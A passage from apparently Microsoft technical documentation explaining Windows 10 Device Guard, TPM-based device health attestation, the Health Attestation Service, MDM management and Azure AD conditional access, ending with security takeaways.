The last part of Device Guard is manageability. Code Integrity configuration is exposed through specific
Group Policy Objects, PowerShell cmdlets, and MDM configuration service providers (CSPs).
For more information on how to deploy Device Guard in an enterprise, see the Device Guard deployment guide.
Device Guard scenarios
As previously described, Device Guard is a powerful way to lock down systems. Device Guard is not intended to be
used broadly and it may not always be applicable, but there are some high-interest scenarios.
Device Guard is useful and applicable on fixed workloads systems like cash registers, kiosk machines, Secure
Admin Workstations (SAWs), or well managed desktops. Device Guard is highly relevant on systems that have very
well-defined software that are expected to run and don’t change too frequently. It could also help protect
Information Workers (IWs) beyond just SAWs, as long as what they need to run is known and the set of
applications is not going to change on a daily basis.
SAWs are computers that are built to help significantly reduce the risk of compromise from malware, phishing
attacks, bogus websites, and PtH attacks, among other security risks. Although SAWs can’t be considered a “silver
bullet” security solution to these attacks, these types of clients are helpful as part of a layered, defense-in-depth
approach to security.
To protect high-value assets, SAWs are used to make secure connections to those assets.
Similarly, on corporate fully-managed workstations, where applications are installed by using a distribution tool
like System Center Configuration Manager, Intune, or any third-party device management, then Device Guard is
very applicable. In that type of scenario, the organization has a good idea of the software that an average user is
running.
It could be challenging to use Device Guard on corporate, lightly-managed workstations where the user is typically
allowed to install software on their own. When an organization offers great flexibility, it’s quite difficult to run
Device Guard in enforcement mode. Nevertheless, Device Guard can be run in Audit mode, and in that case, the
event log will contain a record of any binaries that violated the Device Guard policy. When Device Guard is used in
Audit mode, organizations can get rich data about drivers and applications that users install and run.
Before you can benefit from the protection included in Device Guard, Code Integrity policy must be created by
using tools provided by Microsoft, but the policy can be deployed with common management tools, like Group
Policy. The Code Integrity policy is a binary-encoded XML document that includes configuration settings for both
the User and Kernel-modes of Windows 10, along with restrictions on Windows 10 script hosts. Device Guard
Code Integrity policy restricts what code can run on a device.
Note: Device Guard policy can be signed in Windows 10, which adds additional protection against
administrative users changing or removing this policy.
Signed Device Guard policy offers stronger protection against a malicious local administrator trying to defeat
Device Guard.
When the policy is signed, the GUID of the policy is stored in a UEFI pre-OS secure variable which offers
tampering protection. The only way to update the Device Guard policy subsequently is to provide a new version of
the policy signed by the same signer or from a signer specified as part of the Device Guard policy into the
UpdateSigner section.
The importance of signing applications
On computers with Device Guard, Microsoft proposes to move from a world where unsigned apps can be run
without restriction to a world where only signed and trusted code is allowed to run on Windows 10.
With Windows 10, organizations will make line-of-business (LOB ) apps available to members of the organization
through the Microsoft Store infrastructure. More specifically, LOB apps will be available in a private store within the
public Microsoft Store. Microsoft Store signs and distributes Universal Windows apps and Classic Windows apps.
All apps downloaded from the Microsoft Store are signed.
In organizations today, the vast majority of LOB applications are unsigned. Code signing is frequently viewed as a
tough problem to solve for a variety of reasons, like the lack of code signing expertise. Even if code signing is a best
practice, a lot of internal applications are not signed.
Windows 10 includes tools that allow IT pros to take applications that have been already packaged and run them
through a process to create additional signatures that can be distributed along with existing applications.
Why are antimalware and device management solutions still necessary?
Although allow -list mechanisms are extremely efficient at ensuring that only trusted applications can be run, they
cannot prevent the compromise of a trusted (but vulnerable) application by malicious content designed to exploit a
known vulnerability. Device Guard doesn’t protect against user mode malicious code run by exploiting
vulnerabilities.
Vulnerabilities are weaknesses in software that could allow an attacker to compromise the integrity, availability, or
confidentiality of the device. Some of the worst vulnerabilities allow attackers to exploit the compromised device by
causing it to run malicious code without the user’s knowledge.
It’s common to see attackers distributing specially crafted content in an attempt to exploit known vulnerabilities in
user mode software like web browsers (and their plug-ins), Java virtual machines, PDF readers, or document
editors. As of today, 90 percent of discovered vulnerabilities affect user mode applications compared to the
operating system and kernel mode drivers that host them.
To combat these threats, patching is the single most effective control, with antimalware software forming
complementary layers of defense.
Most application software has no facility for updating itself, so even if the software vendor publishes an update that
fixes the vulnerability, the user may not know that the update is available or how to obtain it, and therefore remains
vulnerable to attack. Organizations still need to manage devices and to patch vulnerabilities.
MDM solutions are becoming prevalent as a light-weight device management technology. Windows 10 extends
the management capabilities that have become available for MDMs. One key feature Microsoft has added to
Windows 10 is the ability for MDMs to acquire a strong statement of device health from managed and registered
devices.
Device health attestation
Device health attestation leverages the TPM to provide cryptographically strong and verifiable measurements of
the chain of software used to boot the device.
For Windows 10-based devices, Microsoft introduces a new public API that will allow MDM software to access a
remote attestation service called Windows Health Attestation Service. A health attestation result, in addition with
other elements, can be used to allow or deny access to networks, apps, or services, based on whether devices prove
to be healthy.
For more information on device health attestation, see the Detect an unhealthy Windows 10-based device section.
The following table details the hardware requirements for both virtualization-based security services and the health
attestation feature. For more information, see Minimum hardware requirements.
HARDWARE MOTIVATION
UEFI 2.3.1 or later firmware with Secure Boot enabled Required to support UEFI Secure Boot.
UEFI Secure Boot ensures that the device boots only
authorized code.
Additionally, Boot Integrity (Platform Secure Boot) must
be supported following the requirements in Hardware
Compatibility Specification for Systems for Windows 10
under the subsection:
“System.Fundamentals.Firmware.CS.UEFISecureBoot.Conn
ectedStandby”
Virtualization extensions, such as Intel VT-x, AMD-V, and Required to support virtualization-based security.
SLAT must be enabled
Note
Device Guard can be enabled without using
virtualization-based security.
X64 processor Required to support virtualization-based security that

uses Windows Hypervisor. Hyper-V is supported only on
x64 processor (and not on x86).
Direct Memory Access (DMA) protection can be enabled
to provide additional memory protection but requires
processors to include DMA protection technologies.
IOMMU, such as Intel VT-d, AMD-Vi Support for the IOMMU in Windows 10 enhances system
resiliency against DMA attacks.
Trusted Platform Module (TPM) Required to support health attestation and necessary for
additional key protections for virtualization-based security.
TPM 2.0 is supported. Support for TPM 1.2 was added
beginning in Windows 10, version 1607 (RS1)
This section presented information about several closely related controls in Windows 10. The multi-layer defenses
and in-depth approach helps to eradicate low -level malware during boot sequence. Virtualization-based security is
a fundamental operating system architecture change that adds a new security boundary. Device Guard and
Credential Guard respectively help to block untrusted code and protect corporate domain credentials from theft
and reuse. This section also briefly discussed the importance of managing devices and patching vulnerabilities. All
these technologies can be used to harden and lock down devices while limiting the risk of attackers compromising
them.
Detect an unhealthy Windows 10-based device

As of today, many organizations only consider devices to be compliant with company policy after they’ve passed a
variety of checks that show, for example, that the operating system is in the correct state, properly configured, and
has security protection enabled. Unfortunately, with today’s systems, this form of reporting is not entirely reliable
because malware can spoof a software statement about system health. A rootkit, or a similar low -level exploit, can
report a false healthy state to traditional compliance tools.
The biggest challenge with rootkits is that they can be undetectable to the client. Because they start before
antimalware, and they have system-level privileges, they can completely disguise themselves while continuing to
access system resources. As a result, traditional computers infected with rootkits appear to be healthy, even with
antimalware running.
As previously discussed, the health attestation feature of Windows 10 uses the TPM hardware component to
securely record a measurement of every boot-related component, including firmware, Windows 10 kernel, and
even early boot drivers. Because, health attestation leverages the hardware-based security capabilities of TPM, the
log of all boot measured components remains out of the reach of any malware.
By attesting a trusted boot state, devices can prove that they are not running low -level malware that could spoof
later compliance checks. TPM -based health attestation provides a reliable anchor of trust for assets that contain
high-value data.
What is the concept of device health?
To understand the concept of device health, it’s important to know traditional measures that IT pros have taken to
prevent the breach of malware. Malware control technologies are highly focused on the prevention of installation
and distribution.
However, the use of traditional malware prevention technologies like antimalware or patching solutions brings a
new set of issues for IT pros: the ability to monitor and control the compliance of devices accessing organization’s
resources.
The definition of device compliance will vary based on an organization’s installed antimalware, device configuration
settings, patch management baseline, and other security requirements. But health of the device is part of the
overall device compliance policy.
The health of the device is not binary and depends on the organization’s security implementation. The Health
Attestation Service provides information back to the MDM on which security features are enabled during the boot
of the device by leveraging trustworthy hardware TPM.
But health attestation only provides information, which is why an MDM solution is needed to take and enforce a
decision.
Remote device health attestation
In Windows 10, health attestation refers to a feature where Measured Boot data generated during the boot process
is sent to a remote device health attestation service operated by Microsoft.
This is the most secure approach available for Windows 10-based devices to detect when security defenses are
down. During the boot process, the TCG log and PCRs values are sent to a remote Microsoft cloud service. Logs
are then checked by the Health Attestation Service to determine what changes have occurred on the device.
A relying party like an MDM can inspect the report generated by the remote health attestation service.
Note: To use the health attestation feature of Windows 10, the device must be equipped with a discrete or
firmware TPM. There is no restriction on any particular edition of Windows 10.
Windows 10 supports health attestation scenarios by allowing applications access to the underlying health
attestation configuration service provider (CSP ) so that applications can request a health attestation token. The
measurement of the boot sequence can be checked at any time locally by an antimalware or an MDM agent.
Remote device health attestation combined with an MDM provides a hardware-rooted method for reporting the
current security status and detecting any changes, without having to trust the software running on the system.
In the case where malicious code is running on the device, the use of a remote server is required. If a rootkit is
present on the device, the antimalware is no longer reliable, and its behavior can be hijacked by a malicious code
running early in the startup sequence. That's why it's important to use Secure Boot and Device Guard, to control
which code is loaded during the boot sequence.
The antimalware software can search to determine whether the boot sequence contains any signs of malware, such
as a rootkit. It can also send the TCG log and the PCRs to a remote health attestation server to provide a separation
between the measurement component and the verification component.
Health attestation logs the measurements in various TPM Platform Configuration Registers (PCRs) and TCG logs
during the boot process.
When starting a device equipped with TPM, a measurement of different components is performed. This includes
firmware, UEFI drivers, CPU microcode, and also all the Windows 10 drivers whose type is Boot Start. The raw
measurements are stored in the TPM PCR registers while the details of all events (executable path, authority
certification, and so on) are available in the TCG log.
The health attestation process works as follows:
1. Hardware boot components are measured.
2. Operating system boot components are measured.
3. If Device Guard is enabled, current Device Guard policy is measured.
4. Windows kernel is measured.
5. Antivirus software is started as the first kernel mode driver.
6. Boot start drivers are measured.
7. MDM server through the MDM agent issues a health check command by leveraging the Health Attestation
CSP.
8. Boot measurements are validated by the Health Attestation Service
Note: By default, the last 100 system boot logs and all associated resume logs are archived in the
%SystemRoot%\logs\measuredboot folder. The number of retained logs may be set with the registry
REG_DWORD value PlatformLogRetention under the
HKLM\SYSTEM\CurrentControlSet\Services\TPM key. A value of 0 will turn off log archival and a value
of 0xffffffff will keep all logs.
The following process describes how health boot measurements are sent to the health attestation service:
1. The client (a Windows 10-based device with TPM ) initiates the request with the remote device health attestation
service. Because the health attestation server is expected to be a Microsoft cloud service, the URI is already pre-
provisioned in the client.
2. The client then sends the TCG log, the AIK signed data (PCR values, boot counter) and the AIK certificate
information.
3. The remote device heath attestation service then:
a. Verifies that the AIK certificate is issued by a known and trusted CA and the certificate is valid and not
revoked.
b. Verifies that the signature on the PCR quotes is correct and consistent with the TCG log value.
c. Parses the properties in the TCG log.
d. Issues the device health token that contains the health information, the AIK information, and the boot
counter information. The health token also contains valid issuance time. The device health token is
encrypted and signed, that means that the information is protected and only accessible to issuing health
attestation service.
4. The client stores the health encrypted blob in its local store. The device health token contains device health
status, a device ID (the Windows AIK), and the boot counter.
Device health attestation components

The device health attestation solution involves different components that are TPM, Health Attestation CSP, and the
Windows Health Attestation Service. Those components are described in this section.
Trusted Platform Module
This section describes how PCRs (that contain system configuration data), endorsement key (EK) (that act as an
identity card for TPM ), SRK (that protect keys) and AIKs (that can report platform state) are used for health
attestation reporting.
In a simplified manner, the TPM is a passive component with limited resources. It can calculate random numbers,
RSA keys, decrypt short data, store hashes taken when booting the device.
A TPM incorporates in a single component:
A RSA 2048-bit key generator
A random number generator
Nonvolatile memory for storing EK, SRK, and AIK keys
A cryptographic engine to encrypt, decrypt, and sign
Volatile memory for storing the PCRs and RSA keys
Endorsement key
The TPM has an embedded unique cryptographic key called the endorsement key. The TPM endorsement key is a
pair of asymmetric keys (RSA size 2048 bits).
The endorsement key public key is generally used for sending securely sensitive parameters, such as when taking
possession of the TPM that contains the defining hash of the owner password. The EK private key is used when
creating secondary keys like AIKs.
The endorsement key acts as an identity card for the TPM. For more information, see Understand the TPM
endorsement key.
The endorsement key is often accompanied by one or two digital certificates:
One certificate is produced by the TPM manufacturer and is called the endorsement certificate. The
endorsement certificate is used to prove the authenticity of the TPM (for example, that it’s a real TPM
manufactured by a specific chip maker) to local processes, applications, or cloud services. The endorsement
certificate is created during manufacturing or the first time the TPM is initialized by communicating with an
online service.
The other certificate is produced by the platform builder and is called the platform certificate to indicate that a
specific TPM is integrated with a certain device. For certain devices that use firmware-based TPM produced by
Intel or Qualcomm, the endorsement certificate is created when the TPM is initialized during the OOBE of
Windows 10.
Note: Secure Boot protects the platform until the Windows kernel is loaded. Then protections like Trusted
Boot, Hyper-V Code Integrity and ELAM take over. A device that uses Intel TPM or Qualcomm TPM gets a
signed certificate online from the manufacturer that has created the chip and then stores the signed certificate
in TPM storage. For the operation to succeed, if you are filtering Internet access from your client devices, you
must authorize the following URLs:
For Intel firmware TPM: https://ekop.intel.com/ekcertservice

For Qualcomm firmware TPM: https://ekcert.spserv.microsoft.com/
Attestation Identity Keys
Because the endorsement certificate is unique for each device and does not change, the usage of it may present
privacy concerns because it's theoretically possible to track a specific device. To avoid this privacy problem,
Windows 10 issues a derived attestation anchor based on the endorsement certificate. This intermediate key, which
can be attested to an endorsement key, is the Attestation Identity Key (AIK) and the corresponding certificate is
called the AIK certificate. This AIK certificate is issued by a Microsoft cloud service.
Note: Before the device can report its health using the TPM attestation functions, an AIK certificate must be
provisioned in conjunction with a third-party service like the Microsoft Cloud CA service. After it is
provisioned, the AIK private key can be used to report platform configuration. Windows 10 creates a signature
over the platform log state (and a monotonic counter value) at each boot by using the AIK.
The AIK is an asymmetric (public/private) key pair that is used as a substitute for the EK as an identity for the TPM
for privacy purposes. The private portion of an AIK is never revealed or used outside the TPM and can only be
used inside the TPM for a limited set of operations. Furthermore, it can only be used for signing, and only for
limited, TPM -defined operations.
Windows 10 creates AIKs protected by the TPM, if available, that are 2048-bit RSA signing keys. Microsoft is
hosting a cloud service called Microsoft Cloud CA to establish cryptographically that it is communicating with a
real TPM and that the TPM possesses the presented AIK. After the Microsoft Cloud CA service has established
these facts, it will issue an AIK certificate to the Windows 10-based device.
Many existing devices that will upgrade to Windows 10 will not have a TPM, or the TPM will not contain an
endorsement certificate. To accommodate those devices, Windows 10 allows the issuance of AIK
certificates without the presence of an endorsement certificate. Such AIK certificates are not issued by
Microsoft Cloud CA. Note that this is not as trustworthy as an endorsement certificate that is burned into the
device during manufacturing, but it will provide compatibility for advanced scenarios like Windows Hello for
Business without TPM.
In the issued AIK certificate, a special OID is added to attest that endorsement certificate was used during the
attestation process. This information can be leveraged by a relying party to decide whether to reject devices that
are attested using AIK certificates without an endorsement certificate or accept them. Another scenario can be to
not allow access to high-value assets from devices that are attested by an AIK certificate that is not backed by an
endorsement certificate.
Storage root key
The storage root key (SRK) is also an asymmetric key pair (RSA with a minimum of 2048 bits length). The SRK has
a major role and is used to protect TPM keys, so that these keys cannot be used without the TPM. The SRK key is
created when the ownership of the TPM is taken.
Platform Configuration Registers
The TPM contains a set of registers that are designed to provide a cryptographic representation of the software
and state of the system that booted. These registers are called Platform Configuration Registers (PCRs).
The measurement of the boot sequence is based on the PCR and TCG log. To establish a static root of trust, when
the device is starting, the device must be able to measure the firmware code before execution. In this case, the Core
Root of Trust for Measurement (CRTM ) is executed from the boot, calculates the hash of the firmware, then stores
it by expanding the register PCR [0] and transfers execution to the firmware.
PCRs are set to zero when the platform is booted, and it is the job of the firmware that boots the platform to
measure components in the boot chain and to record the measurements in the PCRs. Typically, boot components
take the hash of the next component that is to be run and record the measurements in the PCRs. The initial
component that starts the measurement chain is implicitly trusted. This is the CRTM. Platform manufacturers are
required to have a secure update process for the CRTM or not permit updates to it. The PCRs record a cumulative
hash of the components that have been measured.
The value of a PCR on its own is hard to interpret (it is just a hash value), but platforms typically keep a log with
details of what has been measured, and the PCRs merely ensure that the log has not been tampered with. The logs
are referred as a TCG log. Each time a register PCR is extended, an entry is added to the TCG log. Thus, throughout
the boot process, a trace of the executable code and configuration data is created in the TCG log.
TPM provisioning
For the TPM of a Windows 10-based device to be usable, it must first be provisioned. The process of provisioning
differs somewhat based on TPM versions, but, when successful, it results in the TPM being usable and the owner
authorization data (ownerAuth) for the TPM being stored locally on the registry.
When the TPM is provisioned, Windows 10 will first attempt to determine the EK and locally stored ownerAuth
values by looking in the registry at the following location:
HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI\Endorsement
During the provisioning process, the device may need to be restarted.
Note that the Get-TpmEndorsementKeyInfo PowerShell cmdlet can be used with administrative privilege to get
information about the endorsement key and certificates of the TPM.
If the TPM ownership is not known but the EK exists, the client library will provision the TPM and will store the
resulting ownerAuth value into the registry if the policy allows it will store the SRK public portion at the following
location: HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI\Admin\SRKPub
As part of the provisioning process, Windows 10 will create an AIK with the TPM. When this operation is
performed, the resulting AIK public portion is stored in the registry at the following location:
HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI\WindowsAIKPub
Note: For provisioning AIK certificates and filtering Internet access, you must authorize the following wildcard
URL: https://*.microsoftaik.azure.net
Windows 10 Health Attestation CSP

Windows 10 contains a configuration service provider (CSP ) specialized for interacting with the health attestation
feature. A CSP is a component that plugs into the Windows MDM client and provides a published protocol for how
MDM servers can configure settings and manage Windows-based devices. The management protocol is
represented as a tree structure that can be specified as URIs with functions to perform on the URIs such as “get”,
“set”, “delete”, and so on.
The following is a list of functions performed by the Windows 10 Health Attestation CSP:
Collects data that is used to verify a device’s health status
Forwards the data to the Health Attestation Service
Provisions the Health Attestation Certificate that it receives from the Health Attestation Service
Upon request, forwards the Health Attestation Certificate (received from the Health Attestation Service) and
related runtime information to the MDM server for verification
During a health attestation session, the Health Attestation CSP forwards the TCG logs and PCRs values that are
measured during the boot, by using a secure communication channel to the Health Attestation Service.
When an MDM server validates that a device has attested to the Health Attestation Service, it will be given a set of
statements and claims about how that device booted, with the assurance that the device did not reboot between the
time that it attested its health and the time that the MDM server validated it.
Windows Health Attestation Service
The role of Windows Health Attestation Service is essentially to evaluate a set of health data (TCG log and PCR
values), make a series of detections (based on available health data) and generate encrypted health blob or produce
report to MDM servers.
Note: Both device and MDM servers must have access to has.spserv.microsoft.com using the TCP protocol
on port 443 (HTTPS ).
Checking that a TPM attestation and the associated log are valid takes several steps:
1. First, the server must check that the reports are signed by trustworthy AIKs. This might be done by checking
that the public part of the AIK is listed in a database of assets, or perhaps that a certificate has been checked.
2. After the key has been checked, the signed attestation (a quote structure) should be checked to see whether it is
a valid signature over PCR values.
3. Next the logs should be checked to ensure that they match the PCR values reported.
4. Finally, the logs themselves should be examined by an MDM solution to see whether they represent known or
valid security configurations. For example, a simple check might be to see whether the measured early OS
components are known to be good, that the ELAM driver is as expected, and that the ELAM driver policy file is
up to date. If all of these checks succeed, an attestation statement can be issued that later can be used to
determine whether or not the client should be granted access to a resource.
The Health Attestation Service provides the following information to an MDM solution about the health of the
device:
Secure Boot enablement
Boot and kernel debug enablement
BitLocker enablement
VSM enabled
Signed or unsigned Device Guard Code Integrity policy measurement
ELAM loaded
Safe Mode boot, DEP enablement, test signing enablement
Device TPM has been provisioned with a trusted endorsement certificate
For completeness of the measurements, see Health Attestation CSP.
The following table presents some key items that can be reported back to MDM depending on the type of
Windows 10-based device.
OS TYPE KEY ITEMS THAT CAN BE REPORTED
Windows 10 Mobile PCR0 measurement

Secure Boot enabled
Secure Boot db is default
Secure Boot dbx is up to date
Secure Boot policy GUID is default
Device Encryption enabled
Code Integrity revocation list timestamp/version is
up to date
Windows 10 for desktop editions PCR0 measurement

Secure Boot Enabled
Secure Boot db matches Expected
Secure Boot dbx is up to date
Secure Boot policy GUID matches Expected
BitLocker enabled
Virtualization-based security enabled
ELAM was loaded
Code Integrity version is up to date
Code Integrity policy hash matches Expected
Leverage MDM and the Health Attestation Service

To make device health relevant, the MDM solution evaluates the device health report and is configured to the
organization’s device health requirements.
A solution that leverages MDM and the Health Attestation Service consists of three main parts:
1. A device with health attestation enabled. This will usually be done as a part of enrollment with an MDM
provider (health attestation will be disabled by default).
2. After this is enabled, and every boot thereafter, the device will send health measurements to the Health
Attestation Service hosted by Microsoft, and it will receive a health attestation blob in return.
3. At any point after this, an MDM server can request the health attestation blob from the device and ask Health
Attestation Service to decrypt the content and validate that it’s been attested.
Interaction between a Windows 10-based device, the Health Attestation Service, and MDM can be performed as
follows:
1. The client initiates a session with the MDM server. The URI for the MDM server would be part of the client app
that initiates the request. The MDM server at this time could request the health attestation data by using the
appropriate CSP URI.
2. The MDM server specifies a nonce along with the request.
3. The client then sends the AIK quoted nonce + the boot counter and the health blob information. This health
blob is encrypted with a Health Attestation Service public key that only the Health Attestation Service can
decrypt.
4. The MDM server:
a. Verifies that the nonce is as expected.
b. Passes the quoted data, the nonce and the encrypted health blob to the Health Attestation Service server.
5. The Health Attestation Service:
a. Decrypts the health blob.
b. Verifies that the boot counter in the quote is correct using the AIK in the health blob and matches the
value in the health blob.
c. Verifies that the nonce matches in the quote and the one that is passed from MDM.
d. Because the boot counter and the nonce are quoted with the AIK from the health blob, it also proves that
the device is the same one as the one for which the health blob has been generated.
e. Sends data back to the MDM server including health parameters, freshness, and so on.
Note: The MDM server (relying party) never performs the quote or boot counter validation itself. It gets the
quoted data and the health blob (which is encrypted) and sends the data to the Health Attestation Service for
validation. This way, the AIK is never visible to the MDM, which thereby addresses privacy concerns.
Setting the requirements for device compliance is the first step to ensure that registered devices that do not meet
health and compliance requirements are detected, tracked, and have actions enforced by the MDM solution.
Devices that attempt to connect to resources must have their health evaluated so that unhealthy and noncompliant
devices can be detected and reported. To be fully efficient, an end-to-end security solution must impose a
consequence for unhealthy devices like refusing access to high-value assets. That is the purpose of conditional
access control, which is detailed in the next section.
Control the security of a Windows 10-based device before access is
granted
Today’s access control technology, in most cases, focuses on ensuring that the right people get access to the right
resources. If users can authenticate, they get access to resources using a device that the organization’s IT staff and
systems know very little about. Perhaps there is some check such as ensuring that a device is encrypted before
giving access to email, but what if the device is infected with malware?
The remote device health attestation process uses measured boot data to verify the health status of the device. The
health of the device is then available for an MDM solution like Intune.
Note: For the latest information on Intune and Windows 10 features support, see the Microsoft Intune blog
and What's new in Microsoft Intune.
The figure below shows how the Health Attestation Service is expected to work with Microsoft’s cloud-based
Intune MDM service.
An MDM solution can then leverage health state statements and take them to the next level by coupling with client
policies that will enable conditional access to be granted based on the device’s ability to prove that it’s malware
free, its antimalware system is functional and up to date, the firewall is running, and the devices patch state is
compliant.
Finally, resources can be protected by denying access to endpoints that are unable to prove they’re healthy. This
feature is much needed for BYOD devices that need to access organizational resources.
Built-in support of MDM in Windows 10
Windows 10 has an MDM client that ships as part of the operating system. This enables MDM servers to manage
Windows 10-based devices without requiring a separate agent.
Third-party MDM server support
Third-party MDM servers can manage Windows 10 by using the MDM protocol. The built-in management client is
able to communicate with a compatible server that supports the OMA-DM protocol to perform enterprise
management tasks. For additional information, see Azure Active Directory integration with MDM.
Note: MDM servers do not need to create or download a client to manage Windows 10. For more
information, see Mobile device management.
The third-party MDM server will have the same consistent first-party user experience for enrollment, which also
provides simplicity for Windows 10 users.
Management of Windows Defender by third-party MDM
This management infrastructure makes it possible for IT pros to use MDM -capable products like Intune, to manage
health attestation, Device Guard, or Windows Defender on Windows 10-based devices, including BYODs that
aren’t domain joined. IT pros will be able to manage and configure all of the actions and settings they are familiar
with customizing by using Intune with Intune Endpoint Protection on down-level operating systems. Admins that
currently only manage domain joined devices through Group Policy will find it easy to transition to managing
Windows 10-based devices by using MDM because many of the settings and actions are shared across both
mechanisms.
For more information on how to manage Windows 10 security and system settings with an MDM solution, see
Custom URI settings for Windows 10 devices.
Conditional access control
On most platforms, the Azure Active Directory (Azure AD ) device registration happens automatically during
enrollment. The device states are written by the MDM solution into Azure AD, and then read by Office 365 (or by
any authorized Windows app that interacts with Azure AD ) the next time the client tries to access an Office 365
compatible workload.
If the device is not registered, the user will get a message with instructions on how to register (also known as
enrolling). If the device is not compliant, the user will get a different message that redirects them to the MDM web
portal where they can get more information on the compliance problem and how to resolve it.
Azure AD authenticates the user and the device, MDM manages the compliance and conditional access policies,
and the Health Attestation Service reports about the health of the device in an attested way.
Office 365 conditional access control

Azure AD enforces conditional access policies to secure access to Office 365 services. A tenant admin can create a
conditional access policy that blocks a user on a non-compliant device from accessing an Office 365 service. The
user must conform to the company’s device policies before access can be granted to the service. Alternately, the
admin can also create a policy that requires users to just enroll their devices to gain access to an Office 365 service.
Policies may be applied to all users of an organization, or limited to a few target groups and enhanced over time to
include additional target groups.
When a user requests access to an Office 365 service from a supported device platform, Azure AD authenticates
the user and device from which the user launches the request; and grants access to the service only when the user
conforms to the policy set for the service. Users that do not have their device enrolled are given remediation
instructions on how to enroll and become compliant to access corporate Office 365 services.
When a user enrolls, the device is registered with Azure AD, and enrolled with a compatible MDM solution like
Intune.
Note Microsoft is working with third-party MDM ISVs to support automated MDM enrollment and policy
based access checks. Steps to turn on auto-MDM enrollment with Azure AD and Intune are explained in the
Windows 10, Azure AD And Microsoft Intune: Automatic MDM Enrollment Powered By The Cloud! blog post.
When a user enrolls a device successfully, the device becomes trusted. Azure AD provides single-sign-on to access
company applications and enforces conditional access policy to grant access to a service not only the first time the
user requests access, but every time the user requests to renew access.
The user will be denied access to services when sign-in credentials are changed, a device is lost/stolen, or the
compliance policy is not met at the time of request for renewal.
Depending on the type of email application that employees use to access Exchange online, the path to establish
secured access to email can be slightly different. However, the key components: Azure AD, Office 365/Exchange
Online, and Intune, are the same. The IT experience and end-user experience also are similar.
Clients that attempt to access Office 365 will be evaluated for the following properties:
Is the device managed by an MDM?
Is the device registered with Azure AD?
Is the device compliant?
To get to a compliant state, the Windows 10-based device needs to:
Enroll with an MDM solution.
Register with Azure AD.
Be compliant with the device policies set by the MDM solution.
Note: At the present time, conditional access policies are selectively enforced on users on iOS and Android
devices. For more information, see the Azure AD, Microsoft Intune and Windows 10 – Using the cloud to
modernize enterprise mobility! blog post.
Cloud and on-premises apps conditional access control

Conditional access control is a powerful policy evaluation engine built into Azure AD. It gives IT pros an easy way
to create access rules beyond Office 365 that evaluate the context of a user's logon to make real-time decisions
about which applications they should be allowed to access.
IT pros can configure conditional access control policies for cloud SaaS applications secured by Azure AD and even
on-premises applications. Access rules in Azure AD leverage the conditional access engine to check device health
and compliance state reported by a compatible MDM solution like Intune in order to determine whether to allow
access.
For more information about conditional access, see Azure Conditional Access Preview for SaaS Apps.
Note: Conditional access control is an Azure AD Premium feature that's also available with EMS. If you don't
have an Azure AD Premium subscription, you can get a trial from the Microsoft Azure site.
For on-premises applications there are two options to enable conditional access control based on a device's
compliance state:
For on-premises applications that are published through the Azure AD Application Proxy, you can configure
conditional access control policies as you would for cloud applications. For more details, see the Azure AD
Conditional Access preview updated: Now supports On-Premises and Custom LOB apps blog post.
Additionally, Azure AD Connect will sync device compliance information from Azure AD to on-premises AD.
ADFS on Windows Server 2016 will support conditional access control based on a device's compliance state. IT
pros will configure conditional access control policies in ADFS that use the device's compliance state reported
by a compatible MDM solution to secure on-premises applications.
The following process describes how Azure AD conditional access works:

1. User has already enrolled with MDM through Workplace Access/Azure AD join which registers device with
Azure AD.
2. When the device boots or resumes from hibernate, a task “Tpm-HASCertRetr” is triggered to request in
background a health attestation blob. Device sends TPM boot measurements to the Health Attestation Service.
3. Health Attestation Service validates device state and issues an encrypted blob to the device based on the health
state with details on failed checks (if any).
4. User logs on and the MDM agent contacts the Intune/MDM server.
5. MDM server pushes down new policies if available and queries health blob state and other inventory state.
6. Device sends a health attestation blob previously acquired and also the value of the other state inventory
requested by the Intune/MDM server.
7. Intune/MDM server sends the health attestation blob to Health Attestation Service to be validated.
8. Health Attestation Service validates that the device which sent the health attestation blob is healthy, and returns
this result to Intune/MDM server.
9. Intune/MDM server evaluates compliance based on the compliance and the queried inventory/health
attestation state from device.
10. Intune/MDM server updates compliance state against device object in Azure AD.
11. User opens app, attempts to access a corporate managed asset.
12. Access gated by compliance claim in Azure AD.
13. If the device is compliant and the user is authorized, an access token is generated.
14. User can access the corporate managed asset.
For more information about Azure AD join, see the Azure AD & Windows 10: Better Together for Work or School
white paper.
Conditional access control is a topic that many organizations and IT pros may not know as well as they should. The
different attributes that describe a user, a device, compliance, and context of access are very powerful when used
with a conditional access engine. Conditional access control is an essential step that helps organizations secure
their environment.
Takeaways and summary

The following list contains high-level key take-aways to improve the security posture of any organization. However,
the few take-aways presented in this section should not be interpreted as an exhaustive list of security best
practices.
Understand that no solution is 100 percent secure
If determined adversaries with malicious intent gain physical access to the device, they could eventually
break through its security layers and control it.
Use health attestation with an MDM solution
Devices that attempt to connect to high-value assets must have their health evaluated so that unhealthy and
noncompliant devices can be detected, reported, and eventually blocked.
Use Credential Guard
Credential Guard is a feature that greatly helps protect corporate domain credentials from pass-the-hash
attacks.
Use Device Guard
Device Guard is a real advance in security and an effective way to help protect against malware. The new
Device Guard feature in Windows 10 blocks untrusted apps (apps not authorized by your organization).
Sign Device Guard policy
Signed Device Guard policy helps protect against a user with administrator privileges trying to defeat the
current policy. When a policy is signed, the only way to modify Device Guard subsequently is to provide a
new version of the policy signed by the same signer or from a signer specify as part of the Device Guard
policy.
Use virtualization-based security
When you have Kernel Mode Code Integrity protected by virtualization-based security, the code integrity
rules are still enforced even if a vulnerability allows unauthorized kernel mode memory access. Keep in mind
that Device Guard devices that run Kernel Code Integrity with virtualization-based security must have
compatible drivers.
Start to deploy Device Guard with Audit mode
Deploy Device Guard policy to targeted computers and devices in Audit mode. Monitor the Code Integrity
event log that indicates a program or a driver would have been blocked if Device Guard was configured in
Enforcement mode. Adjust Device Guard rules until a high level of confidence has been reached. After the
testing phase has been completed, Device Guard policy can be switched to Enforcement mode.
Build an isolated reference machine when deploying Device Guard
Because the corporate network can contain malware, you should start to configure a reference environment
that is isolated from your main corporate network. After that, you can create a code integrity policy that
includes the trusted applications you want to run on your protected devices.
Use AppLocker when it makes sense
Although AppLocker is not considered a new Device Guard feature, it complements Device Guard
functionality for some scenarios like being able to deny a specific Universal Windows apps for a specific user
or a group of users.
Lock down firmware and configuration
After Windows 10 is installed, lock down firmware boot options access. This prevents a user with physical
access from modifying UEFI settings, disabling Secure Boot, or booting other operating systems. Also, in
order to protect against an administrator trying to disable Device Guard, add a rule in the current Device
